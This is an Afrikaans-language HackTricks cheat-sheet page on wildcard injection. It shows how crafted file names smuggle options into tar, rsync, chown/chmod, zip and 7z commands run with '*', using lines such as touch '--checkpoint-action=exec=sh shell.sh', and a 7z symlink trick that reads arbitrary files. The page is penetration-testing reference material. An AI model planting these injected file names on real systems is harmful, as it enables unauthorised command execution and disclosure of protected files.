Wildcards Spare tricks

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
Kry die amptelike PEASS & HackTricks swag
Ontdek The PEASS Family, ons versameling van eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.

chown, chmod

Jy kan aandui watter lêiereienaar en toestemmings jy wil kopieer vir die res van die lêers

touch "--reference=/my/own/path/filename"

Jy kan dit uitbuit deur gebruik te maak van https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (gekombineerde aanval) Meer inligting in https://www.exploit-db.com/papers/33930

Tar

Voer willekeurige opdragte uit:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Jy kan dit uitbuit deur gebruik te maak van https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar aanval) Meer inligting in https://www.exploit-db.com/papers/33930

Rsync

Voer willekeurige opdragte uit:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine

touch "-e sh shell.sh"

Jy kan dit uitbuit deur gebruik te maak van https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (rsync-aanval) Meer inligting in https://www.exploit-db.com/papers/33930

7z

In 7z kan jy selfs deur -- voor * te gebruik (let daarop dat -- beteken dat die volgende inset nie as parameters behandel kan word nie, so net lêernaamspaaie in hierdie geval) 'n willekeurige fout veroorsaak om 'n lêer te lees, so as 'n opdrag soos die volgende deur root uitgevoer word:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

En jy kan lêers in die gids waar dit uitgevoer word, skep. Jy kan die lêer @root.txt en die lêer root.txt skep as 'n symlink na die lêer wat jy wil lees:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Dan, wanneer 7z uitgevoer word, sal dit root.txt behandel as 'n lêer wat die lys van lêers bevat wat dit moet komprimeer (dit is wat die bestaan van @root.txt aandui) en wanneer 7z root.txt lees, sal dit /file/you/want/to/read lees en aangesien die inhoud van hierdie lêer nie 'n lys van lêers is nie, sal dit 'n fout veroorsaak wat die inhoud wys.

Meer inligting in Write-ups van die boks CTF van HackTheBox.

Zip

Voer willekeurige opdragte uit:

zip name.zip files -T --unzip-command "sh -c whoami"

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat, kyk na die SUBSCRIPTION PLANS!
Kry die amptelike PEASS & HackTricks swag
Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud GitHub-opslagplekke.

PreviousSSH Forward Agent exploitation NextUseful Linux Commands

Last updated 2 months ago